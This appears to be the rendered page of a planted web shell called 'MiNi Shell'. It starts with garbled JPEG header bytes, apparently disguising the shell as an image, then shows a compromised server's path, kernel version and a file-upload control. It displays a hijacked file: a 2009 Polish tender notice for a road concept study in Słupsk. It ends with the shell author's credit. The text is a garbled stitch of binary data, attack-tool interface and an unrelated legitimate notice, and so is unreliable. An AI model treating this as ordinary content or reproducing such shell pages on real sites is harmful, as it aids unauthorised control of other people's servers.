JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/144522-N-2009.html

<p class="kh_header"><b>Słupsk: Spięcie korytarza transportowego Zach. Z Płn. Via/Rail Hanseatica (dostęp portu morskiego w Ustce i poligonu NATO do Szpitala Woj. w Słupsku) - odcinek od ul. Poznańskiej do ul. Hubalczyków - opracowanie koncepcji funkcjonalnej</b><br>
<b>Numer ogłoszenia: 144522 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich w Słupsku , ul. Przemysłowa 73/110, 76-200 Słupsk, woj. pomorskie, tel. 059 8410091, faks 059 8410093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Spięcie korytarza transportowego Zach. Z Płn. Via/Rail Hanseatica (dostęp portu morskiego w Ustce i poligonu NATO do Szpitala Woj. w Słupsku) - odcinek od ul. Poznańskiej do ul. Hubalczyków - opracowanie koncepcji funkcjonalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie koncepcji funkcjonalnej inwestycji polegającej na budowie drogi łączącej ul. Poznańską z ul. Hubalczyków w Słupsku.
2.Koncepcja funkcjonalna ma między innymi odpowiedzieć na pytania: w jaki sposób poprowadzić drogę, jaka jest optymalna technologia wykonania drogi oraz jaki jest koszt.
3.Koncepcja funkcjonalna inwestycji ma posłużyć Zamawiającemu do zorientowania się o możliwości realizacji inwestycji oraz wielkości środków niezbędnych do jej realizacji.
4.Koncepcja funkcjonalna inwestycji ma przedstawiać: 
4.1.co najmniej dwuwariantowe rozwiązanie przebiegu drogi z opisem i analizą techniczną, ekonomiczną, środowiskową poszczególnych wariantów oraz uzasadnienie wybranego wariantu;
4.2.porównanie kosztów tych wariantów;
5.Zaproponowane warianty przebiegu drogi powinny być zgodne z istniejącymi i obowiązującymi miejscowymi planami zagospodarowania przestrzennego dla Miasta Słupska.
6.Koncepcja funkcjonalna inwestycji musi co najmniej zawierać: 
6.1.analizę istniejącego ruchu drogowego i prognozę ruchu na wybranym przebiegu projektowanej drogi;
6.2analizę wariantów przebiegu drogi;
6.3.założenia techniczne;
6.4.założenia organizacji i bezpieczeństwa ruchu;
6.5.opis stosunków własnościowych (wypis z rejestru gruntów; mapa sytuacyjno-wysokościowa z zaznaczonymi powierzchniami działek niezbędnych do realizacji inwestycji);
6.6.analizę ekonomiczną określającą planowane koszty całej inwestycji;
6.7.ocenę wpływu drogi na środowisko;
6.8.analizę efektywności społeczno-ekonomicznej;
6.9.sporządzenie cyfrowych map sytuacyjno-wysokościowych w skali 1:500 z naniesionymi własnościami gruntów dla każdego wariantu;
6.10.określenie szacunkowych kosztów związanych z ewentualną wycinką istniejącego drzewostanu;
6.11.wprowadzenie nowych nasadzeń zieleni przydrożnej; 
6.12.dowiązanie do istniejącego i planowanego układu komunikacyjnego na długości planowanej drogi;
6.13.po uzgodnieniu przez Zamawiającego koncepcji funkcjonalnej na etapie sporządzania, wizualizację oraz prezentację w siedzibie Zarządu Dróg Miejskich w Słupsku lub w miejscu wyznaczonym przez Zamawiającego, bez żądania zwrotu kosztów podróży i delegacji;
7.Wymagana ilość opracowań związanych z wykonaniem przedmiotu umowy:
7.1.Koncepcja funkcjonalna (mapy, opracowania, analizy, badania itd.) w wersji papierowej - 3 egzemplarze;
7.2.Koncepcja funkcjonalna w wersji elektronicznej - 3 komplety płyt CD w formacie  doc i pdf oraz rysunki projektowe w formacie dwg.
8.Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki Wykonawcy wymienione we wzorze umowy.
9.Dane do opracowania koncepcji funkcjonalnej, wymagane badania, pomiary, uzgodnienia oraz materiały niezbędne do sporządzenia Wykonawca uzyska we własnym zakresie i na własny koszt.
10.Zamawiający ma prawo wglądu w materiały dotyczące koncepcji funkcjonalnej oraz ma prawo wnoszenia uwag na każdym etapie realizacji umowy.
11.Wykonawca dokona wizji lokalnej w celu uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia. 
12 Oznaczenie przedmiotu zamówienia we Wspólnym Słowniku Zamówień (CPV): 
Główny przedmiot - 74.23.20.00-4 Usługi inżynieryjne w zakresie projektowania.
Dodatkowy przedmiot - 71.31.80.00-0 Inżynieryjne usługi doradcze i konsultacyjne.
13.PODWYKONAWSTWO
Wykonawca zobowiązany jest do podania w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. W przypadku braku określenia podwykonawstwa Zamawiający będzie traktował, iż przedmiot zamówienia zostanie samodzielnie wykonany przez Wykonawcę.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4, 71.31.80.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 3.000 PLN (słownie złotych: trzy tysiące). 
2.Wadium należy wnieść przed upływem terminu składania ofert w formie określonej w art. 45 ust. 6 ustawy Pzp.
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego. Za skuteczny termin wniesienia wadium w formie pieniężnej będzie termin uznania rachunku Zamawiającego w dniu składania ofert. Konto Zamawiającego nr 49 1240 3770 1111 0000 4070 1790. Kopię dowodu wniesienia wadium potwierdzoną za zgodność z oryginałem przez Wykonawcę zaleca się dołączyć do oferty.
4.W przypadku wniesienia wadium w innej formie niż pieniądzu oryginał dokumentu zapakowany w oddzielnej kopercie należy włożyć do opakowania z ofertą, zaś kopię tego dokumentu należy wpiąć do oferty. Opakowanie z wadium ma być oznaczone nazwą i adresem Wykonawcy oraz napisem Wadium do postępowania pn. Spięcie korytarza transportowego Zach. z Płn. Via/Rail Hanseatica (dostęp portu morskiego w Ustce i poligonu NATO do Szpitala Woj. w Słupsku) - odcinek od ul. Poznańskiej do ul. Hubalczyków - opracowanie koncepcji funkcjonalnej - ZDM-XIX-341/16/09.
5.Wadium wniesione w formie poręczenia, gwarancji bankowej lub gwarancji ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i ust. 5 ustawy Pzp.
6.Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 46 ustawy Pzp<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Opis warunków udziału w postępowaniu: 
Wykonawca ubiegający się o udzielenie niniejszego zamówienia publicznego nie może podlegać wykluczeniu na podstawie art. 24 ustawy Pzp oraz zobowiązany jest spełnić warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy Pzp. 
W zakresie warunków wskazanych w art. 22 ust. 1 pkt 2 ustawy Pzp Zamawiający wymaga w szczególności, aby Wykonawca wykazał, iż:
1.1.posiada niezbędną wiedzę i doświadczenie w zakresie wykonywania usług odpowiadających usługom stanowiącym przedmiot zamówienia tj. wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną koncepcję funkcjonalną inwestycji polegającej na budowie drogi lub jedną koncepcję programowo-przestrzenną inwestycji polegającej na budowie drogi.
1.2.dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje do wykonywania niezbędnych opracowań wchodzących w skład koncepcji funkcjonalnej, które będą uczestniczyć w wykonywaniu zamówienia przez cały okres realizacji,w tym co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej i która przynależy do Polskiej (właściwej) Izby Inżynierów Budownictwa.
2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia
2.1.Wykonawcy mogą wspólnie ubiegać się o wykonanie zamówienia. Zgodnie z art. 23 ustawy Pzp przepisy ustawy i zapisy SIWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.
2.2.W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.3.Dokument pełnomocnictwa musi być załączony do oferty w oryginale i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia poprzez reprezentujące ich osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej Wykonawcy.
3.OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU    W POSTĘPOWANIU
3.1.W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia warunki wskazane w pkt 1 rozdziału VIII SIWZ muszą być spełnione łącznie przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia z zastrzeżeniem, że warunek nie podlegania wykluczeniu z postępowania, o którym mowa w art. 22 ust. 1 pkt 4 ustawy Pzp musi być spełniony przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3.2.Zamawiający oceni spełnienie warunków udziału w postępowaniu wymaganych od Wykonawców na podstawie oświadczeń i dokumentów złożonych wraz z ofertą. Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki.
3.3.Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą spełnia albo nie spełnia.
3.4.Niespełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.
3.5.Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Do oferty sporządzonej w oparciu o formularz oferty, stanowiący załącznik nr 1 do SIWZ, należy dołączyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, określonych w rozdziale VIII niniejszej SIWZ:
1.1.Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp w związku z art. 22 ust. 1 ustawy Pzp, o treści zgodnej z zał. nr 2 do SIWZ.
1.2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.3.Wykaz wykonanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, o treści zgodnej z zał. nr 3 do SIWZ oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane należycie. Informacje zawarte w wykazie muszą potwierdzać spełnienie warunku określonego w pkt 1 ppkt 1.1. rozdziału VIII SIWZ;
1.4.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, o treści zgodnej z zał. nr 4 do SIWZ. Informacje zawarte w wykazie muszą potwierdzać spełnienie warunku określonego w pkt 1 ppkt 1.2. rozdziału VIII SIWZ;
1.5.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 1.4., Wykonawca wykazał osoby, którymi będzie dysponował, o treści zgodnej z zał. nr 4A do SIWZ;
1.6.Dokumenty stwierdzające, że osoby, wyszczególnione w wykazie sporządzonym zgodnie z treścią zał. nr 4 do SIWZ, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wskazane w pkt 1 ppkt 1.2. rozdziału VIII SIWZ, oraz dokumenty potwierdzające przynależność do Polskiej (właściwej) Izby Inżynierów Budownictwa, aktualne na dzień złożenia oferty;
2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy z Wykonawców wspólnie ubiegający się o udzielenie zamówienia składa w ofercie dokumenty, o których mowa w pkt 1 ppkt 1.2.
3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się do przepisów § 2 i § 4 rozporządzenia Prezesa Rady Ministrów z 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form,w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.). 
4.Pozostali Wykonawcy dokumenty potwierdzające spełnianie warunków udziału w postępowaniu przedkładają zgodnie z rozporządzeniem Prezesa Rady Ministrów z 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.).
5.W przypadku działania Wykonawcy przez Pełnomocników, należy dołączyć do oferty uwierzytelniony odpis pełnomocnictwa lub pełnomocnictwo w oryginale..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm.slupsk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich w Słupsku,ul.Przemysłowa 73,76-200 Słupsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 10:00, miejsce: Zarząd Dróg Miejskich w Słupsku,ul. Przemysłowa 73,76-200 Słupsk,pok.nr 101 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com